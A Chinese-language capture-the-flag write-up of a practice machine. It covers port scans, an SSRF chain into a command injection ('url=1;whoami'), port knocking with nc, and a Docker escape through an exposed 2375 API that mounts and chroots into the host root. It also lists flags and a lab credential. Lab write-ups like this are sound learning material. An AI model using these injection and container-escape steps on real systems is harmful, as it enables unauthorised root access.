端口扫描

sudo nmap --min-rate 10000 -p- 10.10.179.159 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-25 21:03 CST
Nmap scan report for 10.10.179.159
Host is up (0.25s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
sudo nmap -sT -sV -sC -O -p22,80 10.10.70.210                                                                           [sudo] mikannse 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-03 00:02 CST
Nmap scan report for 10.10.70.210 (10.10.70.210)
Host is up (0.27s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh?
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings:
| GenericLines:
|_ [AM)nZVux:OF
80/tcp open http nginx 1.19.6
|_http-title: docker-escape-nuxt
|_http-server-header: nginx/1.19.6
| http-robots.txt: 3 disallowed entries
|_/api/ /exif-util /*.bak.txt$
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port22-TCP:V=7.94%I=7%D=10/3%Time=651AE9B3%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,E,"\[AM\)nZVux:OF\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

Web

根据房间提示“wellknown”,可以生成一些目录字典来爆破,我就直接看WP来用了,存在一个.well-known的目录

feroxbuster --url=http://escape.thm/.well-known/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt  -x rar zip txt bak php html

用不了gobuster,有一个security.txt文件,访问得到一个目录/api/fl46,并且要以head方式请求

curl -I http://ip/api/fl46

flag1

THM{b801135794bf1ed3a2aafaa44c2e5ad4}

扫目录扫到一个robots.txt

User-agent: *
Allow: /
Disallow: /api/

# Disallow: /exif-util

Disallow: /*.bak.txt$

/exif-util是一个上传界面,URL那边可能可以文件包含?

还有一个*.bak.txt,也就是说存在备份文件,也许需要我们fuzz一下,但是FUZZ不出什么的东西,房间提示说开发人员把备份文件乱放,也许是这个应用的备份

尝试访问aki.bak.txt和exif-util.bak.txt,发现后者存在。看了一下貌似是API调用的备份,大概是用url为参数GET请求这个API

猜测是在/api/exif目录下调用的,但是api-dev-backup应该是另外一台主机,尝试访问

http://escape.thm/api/exif?url=http://api-dev-backup:8080/exif

尝试访问

http://escape.thm/api/exif?url=http://api-dev-backup:8080/exif?url=http://localhost

命令中存在banned word…竟然还有过滤

http://escape.thm/api/exif?url=http://api-dev-backup:8080/exif?url=1;whoami

发现存在命令注入,身份还是root,不过应该是api-dev-backup这台主机的,不出意外是docker

发现一个/root/dev-note.txt

hydra/fluffybunnies123

但是既不能用于SSH登录,也不能用于web服务登录,NOTE说他删除了这个STUFF,嘶

Git

继续探索/root,发现是一个GIT仓库

git log 
git checkout a3d30a7d0510dc6565ff9316e3fb84434916dee8

切换到最初的记录

再次ls,

flag2

THM{0cb4b947043cb5c0486a454b75a10876}

Docker逃逸

除此之外还有一个最初的dev-note

knock on ports 42, 1337, 10420, 6969, and 63000 to open the docker tcp port

我们需要发个文这些端口去开放docker端口?

用netcat吧

nc escape.thm 42
nc escape.thm 1337
nc escape.thm 10420
nc escape.thm 6969
nc escape.thm 63000
sudo nmap -A --min-rate 10000 -p- escape.thm

发现开放了2375docker端口

docker -H escape.thm images
REPOSITORY TAG IMAGE ID CREATED SIZE
exif-api-dev latest 4084cb55e1c7 2 years ago 214MB
exif-api latest 923c5821b907 2 years ago 163MB
frontend latest 577f9da1362e 2 years ago 138MB
endlessh latest 7bde5182dc5e 2 years ago 5.67MB
nginx latest ae2feff98a0c 2 years ago 133MB
debian 10-slim 4a9cd57610d6 2 years ago 69.2MB
registry.access.redhat.com/ubi8/ubi-minimal 8.3 7331d26c1fdf 2 years ago 103MB
alpine 3.9 78a2ce922f86 3 years ago 5.55MB
docker -H escape.thm:2375 run -v /:/mnt --rm -it nginx chroot /mnt sh

直接启动一个nginx镜像(用其他的应该也行)并将宿主机的根目录挂在到/mnt。并将根目录切换为/mnt,这样我们就相当于拿到了宿主机的权限

flag3

THM{c62517c0cad93ac93a92b1315a32d734}

碎碎念

相当有难度的靶机QAQ,尤其是目录发现,还有API调用那边做得懵懵的。不过后面的docker逃逸过程还是挺有意思的,又碰到了熟悉的git。也学到了新的逃逸方法